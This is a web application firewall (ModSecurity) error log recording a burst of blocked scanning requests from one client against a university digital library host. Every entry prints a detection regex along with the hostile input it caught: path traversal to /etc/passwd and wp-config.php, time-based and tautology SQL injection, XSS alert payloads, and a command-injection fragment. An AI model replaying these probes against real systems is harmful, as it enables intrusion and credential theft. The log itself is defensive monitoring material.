[Tue Aug 29 11:43:21.407796 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../ found within ARGS:file: /../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO13acCo-f0AAAdeQ3YAAAAQ"]
[Tue Aug 29 11:43:21.573636 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13acCo-f0AAAdECf4AAAAW"]
[Tue Aug 29 11:43:23.511605 2023] [:error] [pid 1973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13a8Co-f0AAAe1ee8AAAAB"]
[Tue Aug 29 11:43:25.401277 2023] [:error] [pid 1920] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:token: {{token}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO13bcCo-f0AAAeAW8sAAAAu"]
[Tue Aug 29 11:43:27.617115 2023] [:error] [pid 1985] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:id[1]: =(SELECT/**/1/**/WHERE/**/SLEEP(6))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-json/notificationx/v1/notification/1"] [unique_id "ZO13b8Co-f0AAAfBLxkAAAAI"]
[Tue Aug 29 11:43:28.541590 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(0)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13cMCo-f0AAAdSZUMAAAAX"]
[Tue Aug 29 11:43:29.415153 2023] [:error] [pid 1989] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(10)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13ccCo-f0AAAfFJ@kAAAAR"]
[Tue Aug 29 11:43:30.439606 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13csCo-f0AAAe3978AAAAA"]
[Tue Aug 29 11:43:31.389737 2023] [:error] [pid 1984] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:locale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:locale: ../../../../../../../lib/password.properties\\x00en"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/CFIDE/administrator/enter.cfm"] [unique_id "ZO13c8Co-f0AAAfAOaEAAAAH"]
[Tue Aug 29 11:43:36.375525 2023] [:error] [pid 1969] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13eMCo-f0AAAexIDYAAAAN"]
[Tue Aug 29 11:43:37.455250 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ebookdownloadurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:ebookdownloadurl: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/ebook-download/filedownload.php"] [unique_id "ZO13ecCo-f0AAAdSZWEAAAAX"]
[Tue Aug 29 11:43:40.382505 2023] [:error] [pid 1485] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:m(?:s(?:ysaccessobjects|ysaces|ysobjects|ysqueries|ysrelationships|ysaccessstorage|ysaccessxml|ysmodules|ysmodules2|db)|aster\\\\.\\\\.sysdatabases|ysql\\\\.db)|s(?:ys(?:\\\\.database_name|aux)|chema(?:\\\\W*\\\\(|_name)|qlite(_temp)?_master)|d(?:atabas|b_n ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "84"] [id "981320"] [rev "2"] [msg "SQL Injection Attack: Common DB Names Detected"] [data "Matched Data: db_name( found within XML: \\x0a  \\x0a    \\x0a      1=db_name(1)\\x0a    \\x0a  \\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/iOffice/prg/set/wss/udfmr.asmx"] [unique_id "ZO13fMCo-f0AAAXNudYAAAAg"]
[Tue Aug 29 11:43:40.476673 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) =  found within ARGS:q: 20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null  OR (1 1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO13fMCo-f0AAARpg@IAAAAU"]
[Tue Aug 29 11:43:42.387216 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pow. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:pow: sds\\x22><script>alert(document.domain)</script><\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/Solar_SlideSub.php"] [unique_id "ZO13fsCo-f0AAAeCheQAAAAw"]
[Tue Aug 29 11:43:43.372631 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:valore. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:valore: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/file"] [unique_id "ZO13f8Co-f0AAAdeQ6kAAAAQ"]
[Tue Aug 29 11:43:44.378341 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:s_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:s_id: 1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/arcade.php"] [unique_id "ZO13gMCo-f0AAAdSZWYAAAAX"]
[Tue Aug 29 11:43:47.402274 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/render.html"] [unique_id "ZO13g8Co-f0AAAdb7s4AAAAb"]
[Tue Aug 29 11:43:48.349672 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:step. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:step: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/ad-widget/views/modal/"] [unique_id "ZO13hMCo-f0AAAdb7tAAAAAb"]
[Tue Aug 29 11:43:48.379864 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13hMCo-f0AAAdftcYAAAAG"]
[Tue Aug 29 11:43:49.448489 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/alerts/alertLightbox.php"] [unique_id "ZO13hcCo-f0AAAeX1JcAAAAK"]
[Tue Aug 29 11:43:50.389195 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibfeb.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO13hsCo-f0AAAe8l40AAAAF"]
[Tue Aug 29 11:43:50.449677 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:template_path: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/koha/svc/virtualshelves/search"] [unique_id "ZO13hsCo-f0AAAe8l5AAAAAF"]
[Tue Aug 29 11:43:51.357690 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:inputFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:inputFile: ../../../../../index.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/resin-doc/resource/tutorial/jndi-appconfig/test"] [unique_id "ZO13h8Co-f0AAAeChg0AAAAw"]
[Tue Aug 29 11:43:55.328051 2023] [:error] [pid 2012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAfcoL8AAAAa"]
[Tue Aug 29 11:43:55.689463 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAfiYjgAAAAg"]
[Tue Aug 29 11:43:56.372503 2023] [:error] [pid 2021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ID: 0 AND (SELECT 1 FROM (SELECT(SLEEP(7)))test)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO13jMCo-f0AAAfloQsAAAAj"]
[Tue Aug 29 11:43:57.385313 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: files/admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/editor_tools/module"] [unique_id "ZO13jcCo-f0AAAdeQ7sAAAAQ"]
[Tue Aug 29 11:43:58.367234 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13jsCo-f0AAAfZj00AAAAN"]
[Tue Aug 29 11:43:59.368045 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/hms/admin/"] [unique_id "ZO13j8Co-f0AAAenGdgAAAAM"]
[Tue Aug 29 11:44:03.369008 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Fun. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../ found within ARGS:Fun: msaDataCenetrDownLoadMore delflag=1 downLoadFileName=msagroup.txt downLoadFile=../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/msa/main.xp"] [unique_id "ZO13k8Co-f0AAAdfteMAAAAG"]
[Tue Aug 29 11:44:03.719987 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO13k8Co-f0AAAdb7xMAAAAb"]
